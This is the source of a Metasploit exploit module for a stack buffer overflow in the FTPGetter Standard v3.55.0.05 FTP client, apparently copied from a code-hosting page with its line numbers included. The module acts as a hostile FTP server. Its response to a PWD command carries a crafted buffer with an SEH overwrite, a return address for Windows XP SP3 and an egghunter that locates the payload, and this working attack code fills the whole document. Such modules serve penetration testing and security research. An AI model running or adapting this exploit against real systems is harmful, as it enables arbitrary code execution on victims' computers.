Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::FtpServer
10
  include Msf::Exploit::Remote::Egghunter
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)',
15
      'Description'    => %q{
16
          This module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client.
17
        When processing the response on a PWD command, a stack based buffer overflow occurs.
18
        This leads to arbitrary code execution when a structured exception handler gets
19
        overwritten.
20
      },
21
      'Author' 	 =>
22
        [
23
          'ekse',	# found the bug
24
          'corelanc0d3r <peter.ve[at]corelan.be>',	#  wrote the exploit
25
        ],
26
      'License'        => MSF_LICENSE,
27
      'References'     =>
28
        [
29
          [ 'OSVDB', '68638'],
30
          [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
31
        ],
32
      'DefaultOptions' =>
33
        {
34
          'EXITFUNC' => 'thread',
35
        },
36
      'Payload'        =>
37
        {
38
          'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",
39
        },
40
      'Platform'       => 'win',
41
      'Targets'        =>
42
        [
43
          [ 'XP SP3 Universal', { 'Offset' => 485, 'Ret' => 0x100139E5  } ],  # ppr [ssleay32.dll]
44
        ],
45
      'Privileged'     => false,
46
      'DisclosureDate' => '2010-10-12',
47
      'DefaultTarget'  => 0))
48

49
  end
50

51
  def setup
52
    super
53
    badchars = ""
54
    eggoptions =
55
    {
56
    :checksum => true,
57
    :eggtag => "W00T"
58
    }
59
    @hunter,@egg = generate_egghunter(payload.encoded,badchars,eggoptions)
60
  end
61

62
  def on_client_unknown_command(c,cmd,arg)
63
    c.put("200 OK\r\n")
64
  end
65

66
  def on_client_command_pass(c,arg)
67
    @state[c][:pass] = arg
68
    c.put("230 OK #{@egg}\r\n")
69
    return
70
  end
71

72
  def on_client_command_pwd(c,arg)
73
    junk1 = "A" * target['Offset']
74
    junk2 = "A" * 9
75
    nseh = "\x74\x06\x41\x41"
76
    jmp = "\x75\x08"
77
    seh = [target.ret].pack('V')
78
    junk3 = "D" * 22000
79
    #dual offset
80
    buffer = junk1 + nseh + seh + junk2 + jmp + nseh + seh + @hunter + junk3
81
    c.put("257 \"/\" #{buffer}\r\n")
82
    print_status("Sent payload, #{buffer.length} bytes")
83
    print_status("Wait for hunter ...")
84
    return
85
  end
86
end
87

88